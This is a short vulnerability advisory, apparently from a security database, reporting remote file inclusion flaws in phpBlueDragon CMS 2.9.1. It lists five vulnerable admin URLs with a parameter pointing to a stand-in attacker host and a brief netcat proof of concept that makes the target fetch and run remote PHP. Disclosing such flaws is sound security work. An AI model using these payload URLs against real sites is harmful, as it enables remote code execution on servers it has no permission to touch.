phpBlueDragon CMS 2.9.1 multiple remote file inclusion vuln

2007.01.30
Credit: shm
Risk: High
Local: No
Remote: Yes
CWE: CWE-94


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

PHPBlueDragon CMS <= 2.9.1 http://phpbluedragon.net/ Affected files: root_includes/root_modules/team_admin.php?action=move_item&template_redi rect=yes&vsDragonRootPath=http://bad.hacker.com:6666/ root_includes/root_modules//rss_admin.php?action=move_item&template_redi rect=yes&vsDragonRootPath=http://bad.hacker.com:6666/ root_includes/root_modules/manual_admin.php?action=move_item&template_re direct=yes&vsDragonRootPath=http://bad.hacker.com:6666/ root_includes/root_modules/forum_admin.php?action=group_move&template_re direct=yes&vsDragonRootPath=http://bad.hacker.com:6666/ root_includes/root_modules/forum_admin.php?action=forum_move&template_re direct=yes&vsDragonRootPath=http://bad.hacker.com:6666/ Solution: None Simple PoC: nc -l -p 9999 ... http://some.site/root_includes/root_modules/forum_admin.php?action=forum _move&template_redirect=yes&vsDragonRootPath=http://192.168.0.xx:9999/ ... $ nc -l -p 9999 GET /public_includes/pub_kernel/pbd_move. HTTP/1.0 Host: 192.168.0.xx:9999 HTTP/0.9 200 OK <?php phpinfo(); ?> ... System OpenBSD xxx 3.9 xxx i386 ... Credits: shm


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top